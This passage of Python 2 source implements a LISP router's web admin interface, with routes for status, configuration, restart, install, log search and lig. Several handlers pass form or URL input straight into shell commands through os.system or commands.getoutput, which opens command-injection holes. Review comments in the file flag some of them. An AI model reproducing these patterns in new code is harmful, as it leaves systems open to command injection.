    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    return lispconfig.lisp_not_supported()
#enddef
#
# lisp_show_status_command
#
# Show some version and system info.
#
@bottle.route('/lisp/show/status')
def lisp_show_status_command():
    """'Show status' page: versions, uptimes, process status, resource
    utilization and release notes -- plus admin buttons for superusers.
    (Python 2: uses the 'commands' module and integer division.)
    """
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif

    #
    # Do not print out "show configuration" button or the debug drop-down menu
    # for non-superusers.
    #
    output = ""
    superuser = lispconfig.lisp_is_user_superuser(None)
    if (superuser):
        sc = lisp.lisp_button("show configuration", "/lisp/show/conf")
        dc = lisp.lisp_button("show configuration diff", "/lisp/show/diff")
        ac = lisp.lisp_button("archive configuration", "/lisp/archive/conf")
        cc = lisp.lisp_button("clear configuration", "/lisp/clear/conf/verify")
        lf = lisp.lisp_button("log flows", "/lisp/log/flows")
        ils = lisp.lisp_button("install LISP software", "/lisp/install/image")
        rs = lisp.lisp_button("restart LISP subsystem", "/lisp/restart/verify")
        output = "<center>{}{}{}{}{}{}{}</center><hr>".format(sc, dc, ac, cc,
            lf, ils, rs)
    #endif

    sys_uptime = commands.getoutput("uptime")
    uname = commands.getoutput("uname -pv")
    main_version = lisp.lisp_version.replace("+", "")

    #
    # This is really broken. It returns twice as many CPUs than really on the
    # machine (on MacOS). Halved below on Darwin.
    #
    cpu_count = multiprocessing.cpu_count()

    i = sys_uptime.find(", load")
    sys_uptime = sys_uptime[0:i]
    elapsed = lisp.lisp_print_elapsed(lisp.lisp_uptime)
    top = "Not available"

    #
    # Get LISP process status.
    #
    command = "ps auww" if lisp.lisp_is_macos() else "ps aux"
    status = commands.getoutput( \
        "{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep". \
        format(command))
    # NOTE(review): every other call site in this file uses
    # lisp.lisp_space(); confirm lisp.space() exists in the lisp module.
    status = status.replace(" ", lisp.space(1))
    status = status.replace("\n", "<br>")

    #
    # top on MacOS. Insert <br> separators so each stat is its own line.
    #
    if (uname.find("Darwin") != -1):
        cpu_count = cpu_count / 2
        top = commands.getoutput("top -l 1 | head -50")
        top = top.split("PID")
        top = top[0]

        #
        # Massage the 'top' output so we can have one line per information
        # line.
        #
        i = top.find("Load Avg")
        j = top[0:i].find("threads")
        processes = top[0:j+7]
        top = processes + "<br>" + top[i::]
        i = top.find("CPU usage")
        top = top[0:i] + "<br>" + top[i::]
        i = top.find("SharedLibs:")
        top = top[0:i] + "<br>" + top[i::]
        i = top.find("MemRegions")
        top = top[0:i] + "<br>" + top[i::]
        i = top.find("PhysMem")
        top = top[0:i] + "<br>" + top[i::]
        i = top.find("VM:")
        top = top[0:i] + "<br>" + top[i::]
        i = top.find("Networks")
        top = top[0:i] + "<br>" + top[i::]
        i = top.find("Disks")
        top = top[0:i] + "<br>" + top[i::]
    else:
        #
        # top on Fedora Linux.
        #
        lines = commands.getoutput("top -b -n 1 | head -50")
        lines = lines.split("PID")
        lines[1] = lines[1].replace(" ", lisp.space(1))
        lines = lines[0] + lines[1]
        top = lines.replace("\n", "<br>")
    #endif

    release_notes = commands.getoutput("cat release-notes.txt")
    release_notes = release_notes.replace("\n", "<br>")

    output += '''
    <br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
    <tr>
    <td width="20%"><i>LISP Subsystem Version:<br>
    LISP Release {} Build Date:</i></td>
    <td width="80%"><font face="Courier New">{}<br>
    {}</font></td>
    </tr>
    <tr>
    <td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
    <td width="80%"><font face="Courier New">{}<br>
    {}</font></td>
    </tr>
    <tr>
    <td width="20%"><i>System Architecture:<br>
    Number of CPUs:<font face="Courier New">{}{}</font></td>
    <td width="80%"><font face="Courier New">{}</font></td>
    </tr>
    <tr>
    <td width="20%" valign="top"><i>LISP Process Status:</i></td>
    <td width="80%">
    <div style="height: 100px; overflow: auto">
    <font size="2" face="Courier New">{}</font></div></td>
    </tr>
    <tr>
    <td width="20%" valign="top"><i>System Resource Utilization:</i></td>
    <td width="80%">
    <div style="height: 200px; overflow: auto">
    <font face="Courier New">{}</font></td>
    </tr>
    <tr>
    <td width="20%" valign="top"><i>Release Notes:</i></td>
    <td width="80%">
    <div style="height: 300px; overflow: auto">
    <font size="2" face="Courier New">{}</font></div></td>
    </tr>
    </table>
    '''.format(main_version, lisp.lisp_version, lisp_build_date, elapsed,
        sys_uptime, lisp.lisp_space(1), cpu_count, uname, status, top,
        release_notes)
    return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_show_conf_command
#
# Show configuration file.
#
@bottle.route('/lisp/show/conf')
def lisp_show_conf_command():
    """Serve the raw lisp.config file to an authenticated user."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    return bottle.static_file("lisp.config", root="./", mimetype="text/plain")
#enddef
#
# lisp_show_diff_command
#
# Show configuration diff file.
#
@bottle.route('/lisp/show/diff')
def lisp_show_diff_command():
    """Serve the configuration diff file to an authenticated user."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    diff = bottle.static_file("lisp.config.diff", root="./",
        mimetype="text/plain")
    return diff
#enddef
#
# lisp_archive_conf_command
#
# Save a copy of lisp.config in lisp.config.archive.
#
@bottle.route('/lisp/archive/conf')
def lisp_archive_conf_command():
    """Copy lisp.config to lisp.config.archive under the config lock."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    # Hold the IPC/config lock so a half-written file is never copied.
    lisp.lisp_ipc_lock.acquire()
    os.system("cp ./lisp.config ./lisp.config.archive")
    lisp.lisp_ipc_lock.release()
    message = lisp.lisp_print_sans("Configuration file saved to ")
    message += lisp.lisp_print_cour("./lisp.config.archive")
    return lispconfig.lisp_show_wrapper(message)
#enddef
#
# lisp_clear_conf_command
#
# Clear contents of the lisp.config file.
#
@bottle.route('/lisp/clear/conf')
def lisp_clear_conf_command():
    """Reset lisp.config to a pristine copy, backing up the old one first."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    os.system("cp ./lisp.config ./lisp.config.before-clear")
    lisp.lisp_ipc_lock.acquire()
    lisp_core_cp_lisp_config()
    lisp.lisp_ipc_lock.release()
    message = lisp.lisp_print_sans(
        "Configuration cleared, a backup copy is stored in ")
    message += lisp.lisp_print_cour("./lisp.config.before-clear")
    return lispconfig.lisp_show_wrapper(message)
#enddef
#
# lisp_clear_conf_verify_command
#
# Ask user if they really want to clear the config file.
#
@bottle.route('/lisp/clear/conf/verify')
def lisp_clear_conf_verify_command():
    """Confirmation page shown before clearing the configuration."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    prompt = lisp.lisp_print_sans(
        "<br>Are you sure you want to clear the configuration?")
    buttons = lisp.lisp_button("yes", "/lisp/clear/conf") + \
        lisp.lisp_button("cancel", "/lisp")
    return lispconfig.lisp_show_wrapper(prompt + buttons + "<br>")
#enddef
#
# lisp_get_port_on_command_line
#
# Figure out if the lisp-core.pyo process was started with a parameter. If so,
# it is the port number we use for bottle. We want to restart using the same
# parameters.
#
def lisp_get_port_on_command_line():
    """Return the port argument ("443", "-8080" or "8080") the running
    lisp-core.pyo process was started with, or "" when none is found, so
    a restart can reuse the same port. (Python 2 'commands' module.)
    """
    port = ""
    for p in ["443", "-8080", "8080"]:
        c = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep'.format(p)
        output = commands.getoutput(c)
        if (output == ""): continue

        output = output.split("\n")[0]
        output = output.split(" ")
        if (output[-2] == "lisp-core.pyo" and output[-1] == p): port = p
        # NOTE(review): this break is unconditional once any ps output
        # matched, so the loop stops at the first candidate even when the
        # trailing-argument check above did not set port -- looks like
        # "first match wins" is intended, but worth confirming.
        break
    #endfor
    return(port)
#enddef
#
# lisp_restart_command
#
# Restart the LISP subsystem.
#
@bottle.route('/lisp/restart')
def lisp_restart_command():
    """Restart the LISP subsystem by running ./RESTART-LISP (via sudo)
    from a helper thread, preserving the current bottle port.
    (Python 2: 'thread' is the low-level threading module.)
    """
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif

    #
    # Check to see if requiretty is in effect. If so, we can't sudo, so tell
    # user.
    #
    line = commands.getoutput("egrep requiretty /etc/sudoers").split(" ")
    if (line[-1] == "requiretty" and line[0] == "Defaults"):
        output = "Need to remove 'requiretty' from /etc/sudoers"
        output = lisp.lisp_print_sans(output)
        return(lispconfig.lisp_show_wrapper(output))
    #endif

    lisp.lprint(lisp.bold("LISP subsystem restart request received", False))

    #
    # Check if we should start the process with 443 (or -8080) as the port
    # number for the lisp-core should run on.
    #
    port = lisp_get_port_on_command_line()

    #
    # Build command and launch it in another process. The 'sleep 1' gives
    # this request time to return a page before the restart kills bottle.
    #
    c = "sleep 1; sudo ./RESTART-LISP {}".format(port)
    thread.start_new_thread(os.system, (c, ))

    output = lisp.lisp_print_sans("Restarting LISP subsystem ...")
    return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_restart_verify_command
#
# Ask user if they really want to restart the LISP subsystem.
#
@bottle.route('/lisp/restart/verify')
def lisp_restart_verify_command():
    """Confirmation page shown before restarting the LISP subsystem."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    prompt = lisp.lisp_print_sans(
        "<br>Are you sure you want to restart the LISP subsystem?")
    buttons = lisp.lisp_button("yes", "/lisp/restart") + \
        lisp.lisp_button("cancel", "/lisp")
    return lispconfig.lisp_show_wrapper(prompt + buttons + "<br>")
#enddef
#
# lisp_install_command
#
# Install tgz file user supplied in html form.
#
@bottle.route('/lisp/install', method="post")
def lisp_install_command():
    """Download and install the lispers.net release tarball named in the
    posted 'image_url' form field, via lisp-get-bits.pyo."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    image = bottle.request.forms.get("image_url")

    #
    # Loose sanity check: URL must mention lispers.net and .tgz.
    # NOTE(review): 'image' is user input interpolated into os.system()
    # below -- even behind authentication, shell-quoting it would be safer.
    #
    if (image.find("lispers.net") == -1 or image.find(".tgz") == -1):
        string = "Invalid install request for file {}".format(image)
        lisp.lprint(lisp.bold(string, False))
        output = lisp.lisp_print_sans("Invalid lispers.net tarball file name")
        return(lispconfig.lisp_show_wrapper(output))
    #endif

    # Different output-redirection syntax per platform shell.
    if (lisp.lisp_is_ubuntu()):
        c = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null".format(image)
    else:
        c = "python lisp-get-bits.pyo {} force >& /dev/null".format(image)
    #endif
    status = os.system(c)

    # Success is judged by the tarball having landed on disk.
    image_file = image.split("/")[-1]
    if (os.path.exists(image_file)):
        release = image.split("release-")[1]
        release = release.split(".tgz")[0]
        output = "Install completed for release {}".format(release)
        output = lisp.lisp_print_sans(output)
        output += "<br><br>" + lisp.lisp_button("restart LISP subsystem",
            "/lisp/restart/verify") + "<br>"
    else:
        string = lisp.lisp_print_cour(image)
        output = "Install failed for file {}".format(string)
        output = lisp.lisp_print_sans(output)
    #endif

    string = "Install request for file {} {}".format(image,
        "succeeded" if (status == 0) else "failed")
    lisp.lprint(lisp.bold(string, False))
    return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_install_get_image
#
# Ask user for tgz image to install.
#
@bottle.route('/lisp/install/image')
def lisp_install_get_image():
    """Form page asking for a lispers.net tarball URL to install."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    prompt = lisp.lisp_print_sans("<br>Enter lispers.net tarball URL:")
    form = '''
    <form action="/lisp/install" method="post" style="display: inline;">
    {}
    <input type="text" name="image_url" size="75" required/>
    <input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
    </form><br>'''.format(prompt)
    return lispconfig.lisp_show_wrapper(form)
#enddef
#
# lisp_log_flows_command
#
# Touch file ./log-flows so we can have the user request a dump of the memory
# based flow log.
#
@bottle.route('/lisp/log/flows')
def lisp_log_flows_command():
    """Touch ./log-flows, requesting a dump of the in-memory flow log."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    os.system("touch ./log-flows")
    message = lisp.lisp_print_sans("Flow data appended to file ")
    link = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
    message += lisp.lisp_print_cour(link)
    return lispconfig.lisp_show_wrapper(message)
#enddef
#
# lisp_search_log_command
#
# Search the <num> tail lines of <name> and display in <hr> separated format
# with search keyword in red.
#
@bottle.route('/lisp/search/log/<name>/<num>/<keyword>')
def lisp_search_log_command(name = "", num = "", keyword = ""):
    """Search the last <num> lines of logs/<name>.log for <keyword> and
    render each match with 10 lines of context, keyword highlighted."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif

    #
    # NOTE(review): name/num/keyword come straight from the URL and are
    # interpolated into a shell command -- only reachable by validated
    # users, but shell-quoting them would be safer.
    #
    command = "tail -n {} logs/{}.log | egrep -B10 -A10 {}".format(num, name,
        keyword)
    output = commands.getoutput(command)
    if (output):
        occurences = output.count(keyword)
        output = lisp.convert_font(output)
        output = output.replace("--\n--\n", "--\n")
        output = output.replace("\n", "<br>")
        output = output.replace("--<br>", "<hr>")
        output = "Found <b>{}</b> occurences<hr>".format(occurences) + output
    else:
        output = "Keyword {} not found".format(keyword)
    #endif

    #
    # Highlight keyword in blue. Fix: build the full replacement in one
    # pass -- the original's two-step replace closed </font> before </b>,
    # emitting mis-nested HTML.
    #
    blue = "<font color='blue'><b>{}</b></font>".format(keyword)
    output = output.replace(keyword, blue)

    output = lisp.lisp_print_cour(output)
    return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_search_log_command_input
#
# Get input form data for keyword to search on.
#
@bottle.post('/lisp/search/log/<name>/<num>')
def lisp_search_log_command_input(name = "", num=""):
    """Form handler: pull the search keyword from the POST body and
    delegate to lisp_search_log_command()."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    return lisp_search_log_command(name, num,
        bottle.request.forms.get("keyword"))
#enddef
#
# lisp_show_log_name_command
#
# Show trace log file.
#
@bottle.route('/lisp/show/log/<name>/<num>')
def lisp_show_log_name_command(name = "", num=""):
    """Show the tail of logs/<name>.log (last <num> lines) with a
    keyword-search form at the top."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif

    #
    # Default to print out last 100 lines and convert to html bold.
    #
    if (num == ""): num = 100

    header = '''
    <form action="/lisp/search/log/{}/{}" method="post">
    <i>Keyword search:</i>
    <input type="text" name="keyword" />
    <input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
    </form><hr>
    '''.format(name, num)

    if (os.path.exists("logs/{}.log".format(name))):
        output = commands.getoutput("tail -n {} logs/{}.log".format(num, name))
        output = lisp.convert_font(output)
        output = output.replace("\n", "<br>")
        output = header + lisp.lisp_print_cour(output)
    else:
        a = lisp.lisp_print_sans("File")
        aa = lisp.lisp_print_cour("logs/{}.log".format(name))
        aaa = lisp.lisp_print_sans("does not exist")
        output = "{} {} {}".format(a, aa, aaa)
    #endif
    return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_debug_menu_command
#
# Turn on or off debug.
#
@bottle.route('/lisp/debug/<name>')
def lisp_debug_menu_command(name = ""):
    """Enable/disable debug logging via the drop-down menu.

    *name* is either 'disable%all' or '<component>%<yes|no>'. The
    'data-plane-logging' and 'flow-logging' components live in the
    'lisp xtr-parameters' clause; everything else in 'lisp debug'.
    (Python 2: uses dict.has_key() and indexable keys()/values().)
    """
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif

    #
    # Process "disable all" separately: set every 'lisp debug' entry to
    # "no", and the two logging entries of 'lisp xtr-parameters' to "no"
    # while preserving the other xtr-parameters values.
    #
    if (name == "disable%all"):
        data = lispconfig.lisp_get_clause_for_api("lisp debug")
        if (data[0].has_key("lisp debug")):
            new = []
            for entry in data[0]["lisp debug"]:
                key = entry.keys()[0]
                new.append({ key : "no" })
            #endfor
            new = { "lisp debug" : new }
            lispconfig.lisp_put_clause_for_api(new)
        #endif

        data = lispconfig.lisp_get_clause_for_api("lisp xtr-parameters")
        if (data[0].has_key("lisp xtr-parameters")):
            new = []
            for entry in data[0]["lisp xtr-parameters"]:
                key = entry.keys()[0]
                if (key in ["data-plane-logging", "flow-logging"]):
                    new.append({ key : "no" })
                else:
                    new.append({ key : entry[key] })
                #endif
            #endfor
            new = { "lisp xtr-parameters" : new }
            lispconfig.lisp_put_clause_for_api(new)
        #endif
        return(lispconfig.lisp_landing_page())
    #endif

    #
    # Process enabling or disable debug logging for a single item.
    #
    name = name.split("%")
    component = name[0]
    yesno = name[1]

    xtr_parms = ["data-plane-logging", "flow-logging"]
    clause_name = "lisp xtr-parameters" if (component in xtr_parms) else \
        "lisp debug"

    data = lispconfig.lisp_get_clause_for_api(clause_name)
    if (data[0].has_key(clause_name)):
        new = {}
        for entry in data[0][clause_name]:
            new[entry.keys()[0]] = entry.values()[0]
            if (new.has_key(component)): new[component] = yesno
        #endfor
        new = { clause_name: new }
        lispconfig.lisp_put_clause_for_api(new)
    #endif
    return(lispconfig.lisp_landing_page())
#enddef
#
# lisp_clear_command
#
# Send a clear command to a LISP component.
#
@bottle.route('/lisp/clear/<name>')
@bottle.route('/lisp/clear/etr/<etr_name>/<stats_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>/<stats_name>')
@bottle.route('/lisp/clear/itr/<itr_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>')
def lisp_clear_command(name = "", itr_name = '', rtr_name = "", etr_name = "",
    stats_name = ""):
    """Send a "clear" IPC to a LISP component process (superuser only).

    Depending on the URL matched, clears the MR referral cache, an
    ITR/RTR map-cache, or per-RLOC ETR/RTR decapsulation stats."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    #
    # Do various checks.
    #
    if (lispconfig.lisp_is_user_superuser(None) == False):
        output = lisp.lisp_print_sans("Not authorized")
        return(lispconfig.lisp_show_wrapper(output))
    #endif
    #
    # Map the matched URL variables to the target process and a display
    # string. Stats clearing appends "%<stats_name>" to the IPC opcode.
    #
    ipc = "clear"
    if (name == "referral"):
        process = "lisp-mr"
        print_name = "Referral"
    elif (itr_name == "map-cache"):
        process = "lisp-itr"
        print_name = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
    elif (rtr_name == "map-cache"):
        process = "lisp-rtr"
        print_name = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
    elif (etr_name == "stats"):
        process = "lisp-etr"
        print_name = ("ETR '{}' decapsulation <a href='/lisp/show/" + \
            "database'>stats</a>").format(stats_name)
        ipc += "%" + stats_name
    elif (rtr_name == "stats"):
        process = "lisp-rtr"
        print_name = ("RTR '{}' decapsulation <a href='/lisp/show/" + \
            "rtr/map-cache'>stats</a>").format(stats_name)
        ipc += "%" + stats_name
    else:
        output = lisp.lisp_print_sans("Invalid command")
        return(lispconfig.lisp_show_wrapper(output))
    #endif
    #
    # Send IPC to the selected component process. Do not wait for a reply.
    #
    ipc = lisp.lisp_command_ipc(ipc, "lisp-core")
    lisp.lisp_ipc(ipc, lisp_ipc_socket, process)
    #
    # Only touch lisp.config file if there are static map-cache entries.
    #
    exist = commands.getoutput("egrep 'lisp map-cache' ./lisp.config")
    if (exist != ""):
        os.system("touch ./lisp.config")
    #endif
    output = lisp.lisp_print_sans("{} cleared".format(print_name))
    return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_show_map_server_command
#
# Have the lisp-etr process show the map-server configuration.
#
@bottle.route('/lisp/show/map-server')
def lisp_show_map_server_command():
    """Ask the lisp-etr process for its map-server configuration."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    command = "show map-server"
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_database_command
#
# Have the lisp-etr process show the database-mapping configuration.
#
@bottle.route('/lisp/show/database')
def lisp_show_database_command():
    """Ask the lisp-etr process for its database-mapping configuration."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    command = "show database-mapping"
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_itr_map_cache_command
#
# Have the lisp-itr process show the map-cache.
#
@bottle.route('/lisp/show/itr/map-cache')
def lisp_show_itr_map_cache_command():
    """Ask the lisp-itr process for its map-cache."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    command = "show itr-map-cache"
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_itr_rloc_probing_command
#
# Have the lisp-itr process show the RLOC-probe list.
#
@bottle.route('/lisp/show/itr/rloc-probing')
def lisp_show_itr_rloc_probing_command():
    """Ask the lisp-itr process for its RLOC-probe list."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    command = "show itr-rloc-probing"
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_itr_map_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/itr/map-cache/lookup')
def lisp_show_itr_map_cache_lookup():
    """Longest-match lookup of a user-supplied EID in the ITR map-cache."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    eid_str = bottle.request.forms.get("eid")
    if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
        bad = lisp.lisp_print_sans(
            "Address '{}' has invalid format".format(eid_str))
        return(lispconfig.lisp_show_wrapper(bad))
    #endif
    command = "show itr-map-cache%{}".format(eid_str)
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_rtr_map_cache_command
#
# Have the lisp-rtr process show the map-cache.
#
@bottle.route('/lisp/show/rtr/map-cache')
@bottle.route('/lisp/show/rtr/map-cache/<dns>')
def lisp_show_rtr_map_cache_command(dns = ""):
    """Show the lisp-rtr map-cache; append /dns in the URL for the
    DNS-name sorted view."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    command = "show rtr-map-cache-dns" if (dns == "dns") else \
        "show rtr-map-cache"
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_rtr_rloc_probing_command
#
# Have the lisp-rtr process show the RLOC-probe list.
#
@bottle.route('/lisp/show/rtr/rloc-probing')
def lisp_show_rtr_rloc_probing_command():
    """Ask the lisp-rtr process for its RLOC-probe list."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    command = "show rtr-rloc-probing"
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_rtr_map_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/rtr/map-cache/lookup')
def lisp_show_rtr_map_cache_lookup():
    """Longest-match lookup of a user-supplied EID in the RTR map-cache."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    eid_str = bottle.request.forms.get("eid")
    if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
        bad = lisp.lisp_print_sans(
            "Address '{}' has invalid format".format(eid_str))
        return(lispconfig.lisp_show_wrapper(bad))
    #endif
    command = "show rtr-map-cache%{}".format(eid_str)
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_referral_command
#
# Have the lisp-mr show the DDT referral-cache.
#
@bottle.route('/lisp/show/referral')
def lisp_show_referral_command():
    """Ask the lisp-mr process for its DDT referral-cache."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    command = "show referral-cache"
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_referral_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/referral/lookup')
def lisp_show_referral_cache_lookup():
    """Longest-match lookup of a user-supplied EID in the referral-cache."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    eid_str = bottle.request.forms.get("eid")
    if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
        bad = lisp.lisp_print_sans(
            "Address '{}' has invalid format".format(eid_str))
        return(lispconfig.lisp_show_wrapper(bad))
    #endif
    command = "show referral-cache%{}".format(eid_str)
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_delegations_command
#
# Have the lisp-mr show the DDT configured delegation information.
#
@bottle.route('/lisp/show/delegations')
def lisp_show_delegations_command():
    """Ask the lisp-mr process for its configured DDT delegations."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    command = "show delegations"
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_delegations_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/delegations/lookup')
def lisp_show_delegations_lookup():
    """Longest-match lookup of a user-supplied EID in the delegations."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    eid_str = bottle.request.forms.get("eid")
    if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
        bad = lisp.lisp_print_sans(
            "Address '{}' has invalid format".format(eid_str))
        return(lispconfig.lisp_show_wrapper(bad))
    #endif
    command = "show delegations%{}".format(eid_str)
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_site_command
#
# Have the lisp-ms process show the site registration information. Convert
# eid-prefix from format "<iid>-<eid>-<ml>" to "[<iid>]<eid>/<ml>" internal
# format. We need to do this because URLs should avoid square brackets.
#
@bottle.route('/lisp/show/site')
@bottle.route('/lisp/show/site/<eid_prefix>')
def lisp_show_site_command(eid_prefix = ""):
    """Show lisp-ms site registrations, optionally scoped to one
    EID-prefix. The URL form "<iid>-<eid>-<ml>" is converted to the
    internal "[<iid>]<eid>/<ml>" form (URLs avoid square brackets)."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    if (eid_prefix == ""):
        command = "show site"
    else:
        command = lispconfig.lisp_parse_eid_in_url("show site", eid_prefix)
    #endif
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_itr_dyn_eid_command
#
# Show dynamic-EIDs from the ITR's point of view.
#
@bottle.route('/lisp/show/itr/dynamic-eid/<eid_prefix>')
def lisp_show_itr_dyn_eid_command(eid_prefix = ""):
    """Show dynamic-EIDs from the ITR's point of view."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    if (eid_prefix == ""):
        command = "show itr-dynamic-eid"
    else:
        command = lispconfig.lisp_parse_eid_in_url("show itr-dynamic-eid",
            eid_prefix)
    #endif
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_dyn_eid_command
#
# Show dynamic-EIDs from the ETR's point of view.
#
@bottle.route('/lisp/show/etr/dynamic-eid/<eid_prefix>')
def lisp_show_dyn_eid_command(eid_prefix = ""):
    """Show dynamic-EIDs from the ETR's point of view."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    if (eid_prefix == ""):
        command = "show etr-dynamic-eid"
    else:
        command = lispconfig.lisp_parse_eid_in_url("show etr-dynamic-eid",
            eid_prefix)
    #endif
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_site_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/site/lookup')
def lisp_show_site_lookup():
    """Longest-match lookup of a user-supplied EID in the site cache."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    eid_str = bottle.request.forms.get("eid")
    if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
        bad = lisp.lisp_print_sans(
            "Address '{}' has invalid format".format(eid_str))
        return(lispconfig.lisp_show_wrapper(bad))
    #endif
    command = "show site%{}@lookup".format(eid_str)
    return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_lig_command
#
# Do interactive lig.
#
@bottle.post('/lisp/lig')
def lisp_lig_command():
    """Run the lisp-lig tool from the web UI and return its output as an
    HTML page. Form fields: eid, mr (map-resolver), count, no-nat."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    eid = bottle.request.forms.get("eid")
    mr = bottle.request.forms.get("mr")
    count = bottle.request.forms.get("count")
    no_nat = "no-info" if bottle.request.forms.get("no-nat") == "yes" else ""
    #
    # Default map-resolver to localhost.
    #
    if (mr == ""): mr = "localhost"
    #
    # Check for no input. User error.
    #
    if (eid == ""):
        output = "Need to supply EID address"
        return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
    #endif
    #
    # Prefer the source file; "-O lisp-lig.pyo" makes python run the
    # optimized bytecode when only the .pyo is installed.
    #
    lig = ""
    if os.path.exists("lisp-lig.pyo"): lig = "-O lisp-lig.pyo"
    if os.path.exists("lisp-lig.py"): lig = "lisp-lig.py"
    #
    # Something went wrong with the install.
    #
    if (lig == ""):
        output = "Cannot find lisp-lig.py or lisp-lig.pyo"
        return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
    #endif
    if (count != ""): count = "count {}".format(count)
    command = 'python {} "{}" to {} {} {}'.format(lig, eid, mr, count, no_nat)
    output = commands.getoutput(command)
    output = output.replace("\n", "<br>")
    output = lisp.convert_font(output)
    #
    # Indent well-known keywords so the lig output reads hierarchically
    # in the HTML rendering.
    #
    rloc = lisp.space(2) + "RLOC:"
    output = output.replace("RLOC:", rloc)
    empty = lisp.space(2) + "Empty,"
    output = output.replace("Empty,", empty)
